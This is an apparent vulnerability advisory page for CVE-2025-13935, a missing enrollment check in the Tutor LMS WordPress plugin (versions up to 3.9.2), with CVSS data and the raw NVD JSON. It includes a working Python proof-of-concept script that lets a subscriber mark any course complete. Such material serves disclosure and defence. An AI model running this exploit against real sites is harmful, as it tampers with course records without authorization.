Security Vulnerability Report
CVE-2025-13935 CVSS 4.3 MEDIUM

CVE-2025-13935

Published: 2026-01-09 08:15:57
Last Modified: 2026-04-15 00:35:42

Description

The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to unauthorized course completion in all versions up to, and including, 3.9.2. This is due to missing enrollment verification in the 'mark_course_complete' function. This makes it possible for authenticated attackers, with subscriber level access and above, to mark any course as completed.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Tutor LMS < 3.9.3
Tutor LMS 3.9.2 and all earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13935 PoC - Tutor LMS Unauthorized Course Complete
# Affected: Tutor LMS <= 3.9.2
# Author: Security Researcher
# Reference: https://plugins.trac.wordpress.org/changeset/3422766/tutor/trunk/classes/Course.php
import requests
import sys
from urllib.parse import urljoin


def exploit_cve_2025_13935(target_url, username, password, course_id):
    """
    Exploit for CVE-2025-13935: Tutor LMS Missing Enrollment Verification
    Allows authenticated users to mark any course as complete without enrollment.
    """
    session = requests.Session()

    # Step 1: Authenticate with WordPress
    login_url = urljoin(target_url, '/wp-login.php')
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': target_url
    }
    login_response = session.post(login_url, data=login_data)
    # WordPress names its auth cookie 'wordpress_logged_in_<hash>', so an exact
    # key lookup never matches; check the cookie name prefix instead.
    if not any(c.name.startswith('wordpress_logged_in') for c in session.cookies):
        print('[-] Authentication failed')
        return False
    print('[+] Authentication successful')

    # Step 2: Mark course as complete without enrollment verification
    complete_url = urljoin(target_url, '/wp-admin/admin-ajax.php')
    exploit_data = {
        'action': 'tutor_mark_course_complete',
        'course_id': course_id
    }
    complete_response = session.post(complete_url, data=exploit_data)
    if complete_response.status_code == 200:
        print(f'[+] Course {course_id} marked as complete')
        print(f'[+] Response: {complete_response.text}')
        return True
    else:
        print(f'[-] Exploit failed with status {complete_response.status_code}')
        return False


if __name__ == '__main__':
    if len(sys.argv) < 5:
        print(f'Usage: python {sys.argv[0]} <target_url> <username> <password> <course_id>')
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    course = sys.argv[4]
    exploit_cve_2025_13935(target, user, pwd, course)

References

https://plugins.trac.wordpress.org/changeset/3422766/tutor/trunk/classes/Course.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/7b8b111a-9626-41f4-8a13-51f576af0257?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13935",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-09T08:15:57.170",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to unauthorized course completion in all versions up to, and including, 3.9.2. This is due to missing enrollment verification in the 'mark_course_complete' function. This makes it possible for authenticated attackers, with subscriber level access and above, to mark any course as completed."
      },
      {
        "lang": "es",
        "value": "El plugin de solución de eLearning y cursos en línea Tutor LMS para WordPress es vulnerable a la finalización de cursos no autorizada en todas las versiones hasta la 3.9.2, inclusive. Esto se debe a la falta de verificación de inscripción en la función 'mark_course_complete'. Esto permite a atacantes autenticados, con acceso de nivel suscriptor y superior, marcar cualquier curso como completado."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3422766/tutor/trunk/classes/Course.php",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7b8b111a-9626-41f4-8a13-51f576af0257?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}